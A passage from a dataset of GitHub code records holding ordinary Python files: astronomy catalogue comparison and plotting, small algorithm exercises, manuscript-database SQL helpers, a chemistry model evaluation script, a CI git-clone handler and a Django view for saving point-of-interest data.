plt.close()\n################\n\n\n\ntext_args= dict(verticalalignment='center',fontsize=8)\ndef plot_N_per_deg2(obj,type='all',req_mags=[24.,23.4,22.5],addname=''):\n '''image requirements grz<=24,23.4,22.5\n compute number density in each bin for each band mag [18,requirement]'''\n #indices for type for matched and unmatched samples\n index={}\n for inst in ['m_decam','u_decam','m_bokmos','u_bokmos']:\n index[inst]= indices_for_type(obj, inst=inst,type=type) \n bin_nd=dict(decam={},bokmos={})\n for inst in ['decam','bokmos']:\n bin_nd[inst]={}\n for band,req in zip(['g','r','z'],req_mags):\n bin_nd[inst][band]={}\n bin_edges= np.linspace(18.,req,num=15)\n i_m,i_u= index['m_'+inst], index['u_'+inst] #need m+u\n #join m_decam,u_decam OR m_bokmos,u_bokmos and only with correct all,psf,lrg index\n sample= np.ma.concatenate((obj['m_'+inst].data[band+'mag'][i_m], obj['u_'+inst].data[band+'mag'][i_u]),axis=0)\n bin_nd[inst][band]['binc'],bin_nd[inst][band]['cnt'],q25,q50,q75=\\\n bin_up(sample,sample,bin_edges=bin_edges)\n #plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n for cnt,band in zip(range(3),['g','r','z']):\n for inst,color,lab in zip(['decam','bokmos'],['b','g'],['DECaLS','BASS/MzLS']):\n ax[cnt].step(bin_nd[inst][band]['binc'],bin_nd[inst][band]['cnt']/obj['deg2_'+inst], where='mid',c=color,lw=2,label=lab)\n #labels\n for cnt,band in zip(range(3),['g','r','z']):\n xlab=ax[cnt].set_xlabel('%s' % band) #, **laba)\n #ax[cnt].set_ylim(0,0.6)\n #ax[cnt].set_xlim(maglow,maghi)\n ax[0].legend(loc='upper left', **leg_args)\n ylab=ax[0].set_ylabel('counts/deg2') #, **laba)\n ti=plt.suptitle(\"%ss\" % type.upper(),**laba)\n # Make space for and rotate the x-axis tick labels\n fig.autofmt_xdate()\n #put stats in suptitle\n plt.savefig(os.path.join(get_outdir('bmd'),'n_per_deg2_%s%s.png' % (type,addname)), bbox_extra_artists=[ti,xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\n\nparser=argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='DECaLS simulations.')\nparser.add_argument('-fn1', type=str, help='process this brick (required input)',required=True)\nparser.add_argument('-fn2', type=str, help='object type (STAR, ELG, LRG, BGS)',required=True) \nargs = parser.parse_args()\n\n# Set the debugging level\nif args.verbose:\n lvl = logging.DEBUG\nelse:\n lvl = logging.INFO\nlogging.basicConfig(format='%(message)s', level=lvl, stream=sys.stdout)\nlog = logging.getLogger('__name__')\n\n#get lists of tractor cats to compare\nfns_1= read_lines(args.fn1) \nlog.info('Combining tractor catalogues: ',fns_1) \n#if fns_1.size == 1: fns_1,fns_2= [fns_1],[fns_2]\n#object to store concatenated matched tractor cats\na=Matched_Cats()\nfor cnt,cat1,cat2 in zip(range(len(fns_1)),fns_1,fns_2):\n data_1,data_2,m1,m2,m1_unm,m2_unm,d12, deg2_decam,deg2_bokmos= match_it(cat1,cat2)\n if cnt == 0:\n a.initialize(data_1,data_2,m1,m2,m1_unm,m2_unm,d12, deg2_decam,deg2_bokmos)\n else: \n a.add_d12(d12)\n a.deg2_decam+= deg2_decam\n a.deg2_bokmos+= deg2_bokmos\n a.add_dict('m_decam', targets.data_extract(data_1,m1) )\n a.add_dict('m_bokmos', targets.data_extract(data_2,m2))\n a.add_dict('u_decam', targets.data_extract(data_1,m1_unm))\n a.add_dict('u_bokmos', targets.data_extract(data_2,m2_unm))\n#each key a.data[key] becomes DECaLS() object with grz mags,i_lrg, etc\nb={}\nb['d12']= a.d12\nb['deg2_decam']= a.deg2_decam\nb['deg2_bokmos']= a.deg2_bokmos\nfor match_type in a.data.keys(): b[match_type]= targets.DECaLS(a.data[match_type], w1=True)\n#store N matched objects not masked before join decam,bokmos masks\nm_decam_not_masked,m_bokmos_not_masked= b['m_decam'].count_not_masked(),b['m_bokmos'].count_not_masked()\n#update masks for matched objects to be the join of decam and bokmos masks\nmask= np.any((b['m_decam'].mask, b['m_bokmos'].mask),axis=0)\nb['m_decam'].update_masks_for_everything(mask=np.any((b['m_decam'].mask, b['m_bokmos'].mask),axis=0),\\\n mask_wise=np.any((b['m_decam'].mask_wise, b['m_bokmos'].mask_wise),axis=0) )\nb['m_bokmos'].update_masks_for_everything(mask=np.any((b['m_decam'].mask, b['m_bokmos'].mask),axis=0),\\\n mask_wise=np.any((b['m_decam'].mask_wise, b['m_bokmos'].mask_wise),axis=0) )\n\n#plots\n#plot_radec(b)\n#plot_matched_separation_hist(b['d12'])\n# Depths are very different so develop a cut to make fair comparison\n#plot_SN_vs_mag(b, found_by='matched',type='psf')\n# mask=True where BASS SN g < 5 or BASS SN r < 5\nsn_crit=5.\nmask= np.any((b['m_bokmos'].data['gflux']*np.sqrt(b['m_bokmos'].data['gflux_ivar']) < sn_crit,\\\n b['m_bokmos'].data['rflux']*np.sqrt(b['m_bokmos'].data['rflux_ivar']) < sn_crit),\\\n axis=0)\nb['m_decam'].update_masks_for_everything(mask=mask, mask_wise=mask)\nb['m_bokmos'].update_masks_for_everything(mask=mask, mask_wise=mask)\n# contintue with fairer comparison\n#plot_radec(b,addname='snGe5')\n#plot_HistTypes(b,m_types=['m_decam','m_bokmos'],addname='snGe5')\n#plot_SN_vs_mag(b, found_by='matched',type='psf',addname='snGe5')\n#plot_SN_vs_mag(b, found_by='matched',type='all')\n#plot_SN_vs_mag(b, found_by='matched',type='lrg')\n#plot_SN_vs_mag(b, found_by='unmatched',type='all')\n#plot_SN_vs_mag(b, found_by='unmatched',type='psf')\n#plot_SN_vs_mag(b, found_by='unmatched',type='lrg')\n#cm,names= create_confusion_matrix(b)\n#plot_confusion_matrix(cm,names,addname='snGe5')\nplot_dflux_chisq(b,type='psf',addname='snGe5')\n#plot_dflux_chisq(b,type='all',addname='snGe5')\n# Number density cutting to requirement mags: grz<=24,23.4,22.5\nprint('square deg covered by decam=',b['deg2_decam'],'and by bokmos=',b['deg2_bokmos'])\n#plot_N_per_deg2(b,type='psf',addname='snGe5')\n#plot_N_per_deg2(b,type='lrg',addname='snGe5')\nplot_magRatio_vs_mag(b,type='psf',addname='snGe5')\n\n\n\n\nprint('exiting early')\nsys.exit()\n\nplot_matched_dmag_vs_psf_fwhm(b, type='psf')\nplot_matched_decam_vs_bokmos_psf_fwhm(b, type='psf')\n\nprint('finished comparison: bass-mosaic-decals')\n#sys.exit()\n#\n#\n##REVISE THIS BELOW\n##print stats of total objects, each group, # masked, etc\n#print(\"---- DECAM ----\")\n#print(\"N not masked due to grz= %d, N total= %d\" % \\\n# (m_decam_not_masked+b['u_decam'].count_not_masked(), b['m_decam'].count_total()+b['u_decam'].count_total()))\n#print(\"-- Matched --\")\n#print(\"N not masked before join bokmos mask= %d, N not masked after= %d\" % \\\n# (m_decam_not_masked, b['m_decam'].count_not_masked()))\n#print(\"-- Unmatched -- \")\n#print(\"N masked before join bokmos mask = N masked after = %d\" % \\\n# (b['u_decam'].count_total()- b['u_decam'].count_not_masked()))\n####bokmos\n#print(\"---- BOKMOS ----\")\n#print(\"N not masked due to grz= %d, N total= %d\" % \\\n# (m_bokmos_not_masked+b['u_bokmos'].count_not_masked(), b['m_bokmos'].count_total()+b['u_bokmos'].count_total()))\n#print(\"-- Matched --\")\n#print(\"N not masked before join decam mask= %d, N not masked after= %d\" % \\\n# (m_bokmos_not_masked, b['m_bokmos'].count_not_masked()))\n#print(\"-- Unmatched -- \")\n#print(\"N masked before join decam mask = N masked after = %d\" % \\\n# (b['u_bokmos'].count_total()- b['u_bokmos'].count_not_masked()))\n#print('done')\n\n\n","repo_name":"DriftingPig/Obi-Metallica","sub_path":"legacypipe/py/legacyanalysis/compare_tractor_cats.py","file_name":"compare_tractor_cats.py","file_ext":"py","file_size_in_byte":32364,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"26174447291","text":"# pylint: disable=missing-module-docstring,missing-function-docstring,eval-used\nimport sys\n\nimport operator\n\ndef main():\n \"\"\"Implement the calculator\"\"\"\n\n\n ops = {\n '+': operator.add,\n '-': operator.sub,\n '*': operator.mul,\n '/': operator.truediv, # use operator.div for Python 2\n '%': operator.mod,\n '^': operator.xor,\n }\n # print(ops[sys.argv[2]])\n # result = sys.argv[1] + ops[sys.argv[2]] + sys.argv[3]\n result = ops[sys.argv[2]](int(sys.argv[1]), int(sys.argv[3]))\n return result\n\nif __name__ == \"__main__\":\n print(main())\n \n","repo_name":"chachine/data-challenges","sub_path":"01-Python/01-Programming-Basics/05-System-Parameters/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"11859652716","text":"def binary_search(a, i):\r\n MOD = 1000000007\r\n lo = 0\r\n hi = i-1\r\n ans = 0\r\n while lo < hi:\r\n if a[lo]+a[hi] > a[i]:\r\n ans = (ans+hi-lo)%MOD\r\n hi = hi-1\r\n else:\r\n lo = lo+1\r\n return ans\r\n\r\nclass Solution:\r\n # @param A : list of integers\r\n # @return an integer\r\n def nTriang(self, A):\r\n MOD = 1000000007\r\n n = len(A)\r\n A.sort()\r\n ans = 0\r\n for i in range(n-1, 1, -1):\r\n ans =(ans+binary_search(A, i))%MOD\r\n return ans\r\n","repo_name":"PrinceSinghhub/InterviewBit-Two-Pointers","sub_path":"Interview Bit Two Pointer/Counting Triangles.py","file_name":"Counting Triangles.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"17774572585","text":"# COSC 61, Professor Palmer \n# Authors: Abby Owen, Annie Revers\n# author_operations.py - SQL commands for author operations\n\nfrom mysql.connector import MySQLConnection, Error, errorcode, FieldType\nfrom dbconfig import read_db_config\nimport getpass\nfrom ManUser import *\n\n\n# TODO: File BLOBs for insert manuscript\n\n########### register_author ###########\ndef register_author(mycursor, words):\n\n insert_user = \"INSERT INTO SysUser (UserType) VALUES (%s)\"\n user_type = (\"author\", )\n \n \n try: \n mycursor.execute(insert_user, user_type)\n user_id = mycursor.lastrowid\n\n q1 = \"INSERT INTO Author (AuthorId, AuthorFirstName, AuthorLastName, AuthorEmail, AuthorAffiliation) VALUES (%s, %s, %s, %s, %s)\"\n val = (user_id, words[2], words[3], words[4], words[5])\n \n mycursor.execute(q1, val)\n \n print(f\"Thank you for registering. Your author ID is {user_id}\")\n return user_id\n except Error as err:\n print(f\"Error registering author: {err}\")\n return None\n\n\n########### login_author ###########\ndef login_author(mycursor, id):\n \n q = \"SELECT * FROM Author WHERE AuthorId = (%s)\"\n val = int(id)\n try:\n mycursor.execute(q, (val,))\n res = mycursor.fetchone()\n row = dict(zip(mycursor.column_names, res))\n \n print(f\"WELCOME AUTHOR {row['AuthorFirstName']} {row['AuthorLastName']}\".format(row))\n return row\n \n except Error as err:\n print(f\"Error logging in author, no author found with this ID: {err}\")\n return None\n\n\n########### check_author ###########\ndef check_author(mycursor, fname, lname, order):\n check_exist_sql = \"SELECT EXISTS(SELECT 1 FROM Author WHERE AuthorFirstName = %s AND AuthorLastName = %s)\"\n\n vals = (fname, lname)\n try: \n mycursor.execute(check_exist_sql, vals)\n res = mycursor.fetchone()\n if res[0] == 0:\n return None\n else:\n get_id_sql = \"SELECT AuthorId FROM Author WHERE AuthorFirstName = %s AND AuthorLastName = %s\"\n vals = (fname, lname)\n try: \n mycursor.execute(get_id_sql, vals)\n id = mycursor.fetchone()[0]\n return id\n except Error as err:\n print(f\"Error getting co author ID: {err}\")\n return None\n \n except Error as err:\n print(f\"Error accessing Author database: {err}\")\n\n\n########### submit_response ###########\ndef submit_response(man_id, mycursor):\n get_status_sql = \"SELECT ManStatus, DateUpdated FROM Manuscript WHERE ManuscriptId = %s\"\n val = (man_id, )\n try:\n mycursor.execute(get_status_sql, val)\n res = mycursor.fetchone()\n print(f\"Recieved manuscript with unique ID: {man_id}\")\n print(f\"Manuscript {man_id} Status: {res[0]}\")\n print(f\"Manuscript {man_id} recieved at: {res[1]}\")\n except Error as err:\n print(f\"Error getting manuscript information: {err}\")\n\n\n\n########### submit_manuscript ###########\n# We must: \n# INSERT INTO Manuscript (Title, ICode) VALUES (%s, %s)\n# INSERT INTO AuthorGroup (ManuscriptId, AuthorId, OrderNum) VALUES (%s, %s, %s)\n# Check if other authors are in the Author database\n# If they are not, add them.\n# FOR EACH AUTHOR: \n# INSERT INTO AuthorGroup (ManuscriptId, AuthorId, OrderNum) VALUES (%s, %s, %s)\ndef submit_manuscript(user, mycursor, title, icode, authors, filename):\n # Check permissions of user\n if user.get_id() == None:\n print(\"You do not have the proper permissions for this action. Please log in with you Author ID to submit a manuscript.\")\n return None\n \n \n # Insert the manuscript\n insert_man_sql = \"INSERT INTO Manuscript (Title, ICodeId) VALUES (%s, %s)\"\n vals = (title, icode)\n man_id = None\n try:\n mycursor.execute(insert_man_sql, vals)\n man_id = mycursor.lastrowid\n\n except Error as err:\n print(f\"Error inserting manuscript: {err}\")\n return None\n\n # If the manuscript was inserted, add primary author to author group\n if man_id != None:\n insert_primary_sql = \"INSERT INTO AuthorGroup (ManuscriptId, AuthorId, OrderNum) VALUES (%s, %s, %s)\"\n vals = (man_id, user.get_id(), 1)\n try: \n mycursor.execute(insert_primary_sql, vals)\n except Error as err:\n print(f\"Error inserting primary author: {err}\")\n return None\n \n # Check for additional authors\n if len(authors) != 0: \n for i in range(len(authors)):\n a = authors[i]\n fname, lname = a.split(\" \")\n # check if the author is already in the database\n co_id = check_author(mycursor, fname, lname, i)\n\n # if not, insert the author to the database\n if co_id == None: \n try: \n insert_user = \"INSERT INTO SysUser (UserType) VALUES (%s)\"\n u = (\"author\", )\n mycursor.execute(insert_user, u)\n co_id = mycursor.lastrowid\n\n insert_co_sql = \"INSERT INTO Author (AuthorId, AuthorFirstName, AuthorLastName) VALUES (%s, %s, %s)\"\n vals = (co_id, fname, lname)\n \n mycursor.execute(insert_co_sql, vals)\n \n except Error as err:\n print(f\"Error inserting co-author: {err}\")\n # delete manuscript?\n return None\n \n # if the author was in the database\n else:\n insert_group = \"INSERT INTO AuthorGroup (ManuscriptId, AuthorId, OrderNum) VALUES (%s, %s, %s)\"\n print(f\"Author Group ID: {co_id}\")\n vals = (man_id, co_id, i)\n try: \n mycursor.execute(insert_group, vals)\n except Error as err:\n print(f\"Error inserting to Author Group: {err}\")\n \n submit_response(man_id, mycursor)\n return man_id\n\n\n########### status ###########\ndef author_status(mycursor, user):\n try: \n print(\"######### MANUSCRIPT STATUSES #########\")\n statuses = [\"Recieved\", \"Under Review\", \"Rejected\", \"Accepted\", \"Typesetting\", \"Ready\", \"Scheduled\", \"Published\"]\n counts = {}\n for status in statuses:\n get_count = \"SELECT COUNT(ManStatus) FROM LeadAuthorManuscripts WHERE AuthorId = %s AND ManStatus = %s\"\n vals = (user.get_id(), status)\n mycursor.execute(get_count, vals)\n res = mycursor.fetchone()[0]\n counts[status] = res\n \n for c in counts: \n print(f\"{c}: {counts[c]}\")\n # mycursor.execute(status_sql, val)\n # res = mycursor.fetchall()\n \n # output = \"Manuscript Statuses \\n############## \\n Recieved \\n ############## \\n\"\n # for x in res:\n # print(x)\n except Error as err:\n print(f\"Error in getting author manuscripts: {err}\")\n\n \n\n\n\n\n\n\n \n \n\n \n\n \n\n\n\n\n \n\n \n\n\n","repo_name":"abbyowen/lab2cosc61_abby_annie","sub_path":"author_operations.py","file_name":"author_operations.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"15842679221","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 4 11:56:22 2020\n\nThis script assesses what ranking metric is best at ranking\nstructures according to MCS or FP similarity to the true structure.\n\nThis should give an independent assessment from the identity case.\nIf the results differ markedly, we'll have to wonder why.\n\n@author: stravsm\n\"\"\"\n\n\nimport os\nimport sys\nsys.path.append(os.environ['MSNOVELIST_BASE'])\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport infrastructure.score as msc\nimport infrastructure.utils as utils\nimport fp_management.database as db\n\nfrom fp_management import fingerprint_map as fpm\nimport smiles_config as sc\n\nimport time\nimport pickle\nfrom tqdm import tqdm\n# Setup logger\nimport logging\n\nfrom rdkit import Chem\n\nimport h5py\n\nremove_perfect_match = False\nranking_score = \"score_mod_platt\"\nf1_cutoff = 0.5\n\nlogging.basicConfig(format='%(asctime)s - %(message)s', \n datefmt='%d-%b-%y %H:%M:%S')\nlogger = logging.getLogger(\"MSNovelist\")\nlogger.setLevel(logging.INFO)\nlogger.info(\"evaluation_summary startup\")\n\npicklepath = sc.config.get(\"evaluation_picklepath\", {})\n\nfp_map = fpm.FingerprintMap(sc.config[\"fp_map\"])\n\neval_id = str(int(time.time()))\neval_counter = 0\npickle_id = eval_id\nif sc.config['eval_id'] != '':\n eval_id = sc.config['eval_id']\nif sc.config['eval_counter'] != '':\n eval_counter = sc.config['eval_counter']\n pickle_id = sc.config['eval_id'] + \"-\" + sc.config['eval_counter']\n picklepath = {pickle_id: sc.config[\"eval_folder\"] + \"eval_\" + pickle_id + \".pkl\"}\nelse:\n sc.config[\"model_tag\"] = list(picklepath.keys())[0]\n \nsc.config.setdefault('cv_fold', 0)\ncv_fold = sc.config[\"cv_fold\"]\nevaluation_set_ = sc.config['evaluation_set']\nevaluation_set = f\"fold{cv_fold}-{evaluation_set_}\"\n\npicklepath_coverage_ref = sc.config[\"coverage_baseline\"]\n\nevaluation_logger = utils.EvaluationLogger(\"coverage\", sc.config, \n eval_id, eval_counter, pickle_id)\n\ndef check_dict(v):\n if isinstance(v, dict):\n return v[evaluation_set]\n else:\n return v\n\n\nresults_complete = {k: pickle.load(open(pp, 'rb')) for k, pp in picklepath.items()}\nresults_complete = {k: check_dict(v) for k, v in results_complete.items()}\nresults_complete = pd.concat([r[[\"nn\", \"mol\", \"mol_ref\", \n \"fingerprint\", \"fingerprint_ref\", \"fingerprint_ref_true\", \n \"inchikey1\", \"inchikey1_ref\",\n \"score\"]].assign(source = k)\n for k, r in results_complete.items()])\nn_total_ = len(set(results_complete[\"nn\"]))\n\nnn_in_results = set(results_complete[\"nn\"])\n\ncoverage_ref_ = pickle.load(open(picklepath_coverage_ref, 'rb'))\ncoverage_ref = coverage_ref_[evaluation_set]\ncoverage_ref = coverage_ref.loc[lambda row: row[\"mf\"] == row[\"mf_ref\"]]\ncoverage_ref = coverage_ref.loc[coverage_ref[\"nn\"].isin(nn_in_results)]\ncoverage_ref = msc.compute_candidate_scores(coverage_ref, fp_map, \n additive_smoothing_n = n_total_,\n f1_cutoff = f1_cutoff)\n\n\ncoverage_max = coverage_ref.groupby(\"nn\")[ranking_score].agg(max_score_cov = max)\n\n\nresults_ok = results_complete.loc[results_complete[\"fingerprint\"].notna()].copy()\n\n\nif remove_perfect_match:\n results_ok = results_ok.loc[\n results_ok[\"inchikey1\"] != results_ok[\"inchikey1_ref\"]]\n\n\nresults_ok = msc.compute_candidate_scores(results_ok, fp_map, \n additive_smoothing_n = n_total_,\n f1_cutoff = f1_cutoff)\nresults_ok = results_ok.merge(coverage_max, on = \"nn\", how = \"left\")\nresults_ok[\"overcount\"] = results_ok[ranking_score] > results_ok[\"max_score_cov\"]\n\nn_results_ok = len(results_ok)\nlogger.info(f\"Computing coverage for {n_results_ok} results with correct MF\")\n\nresults_coverage_ = results_ok.merge(\n coverage_ref[[\"nn\", \"inchikey1\", \"score\"]],\n how='right',\n left_on = [\"nn\", \"inchikey1\"],\n right_on = [\"nn\", \"inchikey1\"],\n suffixes = ['', '_cov']\n )\nresults_coverage = results_coverage_.groupby(\"nn\").agg(\n coverage = (\"source\", lambda ser: sum(ser.notna())),\n ratio = (\"source\", lambda ser: sum(ser.notna() / len(ser))),\n total = (\"source\", len),\n overcount = (\"overcount\", lambda ser: 0. + sum(ser)))\n\n\ncoverage_summary = coverage_ref.groupby(\"nn\").first()[[\"mol_ref\", \"fingerprint_ref_true\", \"fingerprint_ref\"]]\ncoverage_summary = msc.compute_fp_quality_mw(coverage_summary, fp_map) \ncoverage_summary = coverage_summary.join(results_coverage)\ncoverage_summary[\"rank\"] = coverage_summary[\"ratio\"].rank(ascending=False, method='first')\ncoverage_summary[\"value\"] = coverage_summary[\"ratio\"]\ncoverage_summary[\"eval_score\"] = \"coverage\"\ncoverage_summary[\"eval_metric\"] = \"coverage\"\nevaluation_logger.append_csv(\"rank\", coverage_summary)\n\n\ncoverage_summary.sort_values(\"predicted_fp_quality\", ascending=False, inplace=True)\ncoverage_summary[\"index\"] = np.arange(len(coverage_summary))\ncoverage_summary[\"coverage_sum\"] = np.cumsum(coverage_summary[\"coverage\"])\ncoverage_summary[\"total_sum\"] = np.cumsum(coverage_summary[\"total\"])\ncoverage_summary[\"running_coverage\"] = coverage_summary.apply(lambda row:\n row[\"coverage_sum\"] / row[\"total_sum\"],\n axis=1)\n \n\n\n\nplt.scatter(coverage_summary[\"predicted_fp_quality\"], coverage_summary[\"ratio\"])\n\nfig, (ax1, ax2) = plt.subplots(2, 1)\nax1.invert_xaxis()\nax1.plot(\n coverage_summary[\"predicted_fp_quality\"],\n np.cumsum(coverage_summary[\"total\"])\n )\nax1.plot(\n coverage_summary[\"predicted_fp_quality\"],\n np.cumsum(coverage_summary[\"coverage\"])\n )\nax2.invert_xaxis()\nax2.scatter(\n coverage_summary[\"predicted_fp_quality\"],\n coverage_summary[\"ratio\"],\n )\nax2.plot(\n coverage_summary[\"predicted_fp_quality\"],\n coverage_summary[\"running_coverage\"],\n )\nax2.plot(\n coverage_summary.rolling(window=10)[\"predicted_fp_quality\"].mean(),\n coverage_summary.rolling(window=10)[\"ratio\"].mean())\n\n\ncoverage_summary.sort_values(\"mol_weight\", ascending=True, inplace=True)\ncoverage_summary[\"index\"] = np.arange(len(coverage_summary))\ncoverage_summary[\"coverage_sum\"] = np.cumsum(coverage_summary[\"coverage\"])\ncoverage_summary[\"total_sum\"] = np.cumsum(coverage_summary[\"total\"])\ncoverage_summary[\"running_coverage\"] = coverage_summary.apply(lambda row:\n row[\"coverage_sum\"] / row[\"total_sum\"],\n axis=1)\n\n\n\nfig, (ax1, ax2) = plt.subplots(2, 1)\nax1.plot(\n coverage_summary[\"mol_weight\"],\n np.cumsum(coverage_summary[\"total\"])\n )\nax1.plot(\n coverage_summary[\"mol_weight\"],\n np.cumsum(coverage_summary[\"coverage\"])\n )\nax2.scatter(\n coverage_summary[\"mol_weight\"],\n coverage_summary[\"ratio\"],\n )\nax2.plot(\n coverage_summary[\"mol_weight\"],\n coverage_summary[\"running_coverage\"],\n )\nax2.plot(\n coverage_summary.rolling(window=10)[\"mol_weight\"].mean(),\n coverage_summary.rolling(window=10)[\"ratio\"].mean())\n\n\n\n\n","repo_name":"meowcat/MSNovelist","sub_path":"evaluation/top_rediscovery.py","file_name":"top_rediscovery.py","file_ext":"py","file_size_in_byte":7250,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"79"}
+{"seq_id":"13026036709","text":"#!/usr/bin/python -tt\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.cm as cm\n\ntestdata = pd.read_csv('mnist-test-labeled.csv')\ntraindata = pd.read_csv('train.csv')\n\n#Print the average digit images for the two datasets\ndef extract_digit(n,dset):\n dic = {}\n for index, row in dset.iterrows():\n key = row['label']\n if key not in dic:\n dic[key] = []\n dic[key].append(row)\n img = pd.DataFrame(dic[n])\n mean = img.describe().loc['mean'].values\n return mean\n\ndef transfer(digit_pixel):\n img_matrix = np.zeros((28,28))\n for i in range(0,27):\n for j in range (0,27):\n index = i * 28 + j\n img_matrix[i][j] =digit_pixel[index+1]\n return img_matrix\n\n\ndef displayTrain(digit,dset):\n mean = extract_digit(digit,dset)\n img = transfer(mean)\n plt.imshow(img,cmap=cm.binary)\n fname = 'trainAvg' + str(digit)+'.png'\n plt.savefig(fname)\n\ndef displayTest(digit,dset):\n mean = extract_digit(digit,dset)\n img = transfer(mean)\n plt.imshow(img,cmap=cm.binary)\n fname = 'testAvg' + str(digit)+'.png'\n plt.savefig(fname)\n \nfor i in range(10):\n displayTrain(i,traindata)\n displayTest(i,testdata)","repo_name":"ujkharel/Kaggle-Digit-Recognizer-Competition","sub_path":"AveragePic.py","file_name":"AveragePic.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"6781024010","text":"def reverseParentheses(strr, lenn):\n st = []\n for i in range(lenn):\n \n # Push the index of the current\n # opening bracket\n if (strr[i] == '('):\n st.append(i)\n \n # Reverse the substring starting\n # after the last encountered opening\n # bracket till the current character\n elif (strr[i] == ')'):\n temp = strr[st[-1]:i + 1]\n strr = strr[:st[-1]] + temp[::-1] + \\\n strr[i + 1:]\n del st[-1]\n \n # To store the modified string\n res = \"\"\n for i in range(lenn):\n if (strr[i] != ')' and strr[i] != '('):\n res += strr[i]\n return res\n \n \n\ndef solution(inputString):\n lenn = len(inputString)\n \n return reverseParentheses(inputString, lenn)\n\nstring = 'foo(bar(baz))blim'\nprint(solution(string))\n","repo_name":"aoamusat/codes","sub_path":"py/reverse_in_parentheses.py","file_name":"reverse_in_parentheses.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"1768182203","text":"import os\nimport urllib.parse\n\nfrom jobserv_runner.handlers.simple import HandlerError, SimpleHandler\n\n\nclass GitPoller(SimpleHandler):\n def _get_http_clone_token(self, clone_url):\n secrets = self.rundef.get('secrets', {})\n if clone_url.startswith('https://github.com'):\n tok = secrets.get('githubtok')\n if tok:\n return tok\n\n # we can't determine by URL if its a gitlab repo, so just assume\n # the rundef/secrets are done sanely by the user\n env = self.rundef['env']\n user = env.get('gitlabuser') or secrets.get('gitlabuser')\n if user:\n token = self.rundef['secrets']['gitlabtok']\n return user + ':' + token\n\n def _clone(self, log, dst):\n clone_url = self.rundef['env']['GIT_URL']\n log.info('Clone_url: %s', clone_url)\n\n token = self._get_http_clone_token(clone_url)\n if token:\n log.info('Using an HTTP token for cloning')\n p = urllib.parse.urlsplit(clone_url)\n clone_url = p.scheme + '://' + token + '@' + p.netloc + p.path\n\n if not log.exec(['git', 'clone', clone_url, dst]):\n raise HandlerError(\n 'Unable to clone: ' + self.rundef['env']['GIT_URL'])\n\n sha = self.rundef['env'].get('GIT_SHA')\n if sha:\n log.info('Checking out: %s', sha)\n if not log.exec(['git', 'branch', 'jobserv-run', sha], cwd=dst):\n raise HandlerError('Unable to branch: ' + sha)\n if not log.exec(['git', 'checkout', 'jobserv-run'], cwd=dst):\n raise HandlerError('Unable to checkout: ' + sha)\n\n def prepare_mounts(self):\n mounts = super().prepare_mounts()\n\n repo_dir = os.path.join(self.run_dir, 'repo')\n with self.log_context('Cloning git repository') as log:\n self._clone(log, repo_dir)\n mounts.append((repo_dir, '/repo'))\n self.container_cwd = '/repo'\n return mounts\n\n\nhandler = GitPoller\n","repo_name":"ursinha/jobserv","sub_path":"runner/jobserv_runner/handlers/git_poller.py","file_name":"git_poller.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"27518250309","text":"from django.http import HttpResponse, HttpResponseNotFound\nfrom django.views.decorators.csrf import csrf_exempt\nfrom server.database import get_poi_coords, get_poi_types\nfrom server.config import route_poi\nimport json,logging,ast\nfrom collections import defaultdict\nimport cPickle as pic\n\n@csrf_exempt\ndef get_coords(request):\n with open ('server/poi_coord_route.py') as f:\n lines = f.read().splitlines()\n \n route_poi = map(int, lines)\n tags = request.POST.getlist(\"tags\")\n available_tags = get_poi_types()\n\n for tag in tags:\n if tag not in available_tags:\n return HttpResponseNotFound(\"One of your tags does not exist.\")\n\n return HttpResponse(json.dumps({\"coords\": get_poi_coords(tags,route_poi)}))\n\n\n@csrf_exempt\ndef get_types(request):\n return HttpResponse(json.dumps({\"types\": get_poi_types()}))\n\n@csrf_exempt\ndef save_coords(request):\n try:\n ele = request.POST.getlist(\"elements\")\n name = str(request.POST.get(\"name\"))\n if name.isspace():\n logging.error('saving POis failed since there is no name or there is space in the name',exc_info=True)\n return HttpResponse(\"Json not Saved\")\n\n else:\n filename = \"/home/kthiruko/newbackend_rust/data/poisets/%s.json\" %name\n \n ## I have no idea whyy we get 2 square brackets while writing to a json file so did some stuff to make it right\n json_data = {\"elements\" : map (ast.literal_eval , ele) , \"name\": name}\n struct_element = map (ast.literal_eval , ele)\n d = defaultdict(list)\n d[\"elements\"] = struct_element\n d[\"name\"]=name\n json_d = json.dumps(d)\n data = json.loads(json_d)\n temp = data[\"elements\"]\n data[\"elements\"] = temp[0]\n # what1 = json.dumps(what)\n # print what1\n\n with open(filename, 'w') as outfile:\n json.dump(data,outfile)\n \n return HttpResponse(\"Json Saved\")\n \n except:\n logging.error('saving POis failed',exc_info=True)\n return HttpResponse(\"Json not Saved\")","repo_name":"oSoc17/lopeningent_backend","sub_path":"server/server/interface/pois.py","file_name":"pois.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
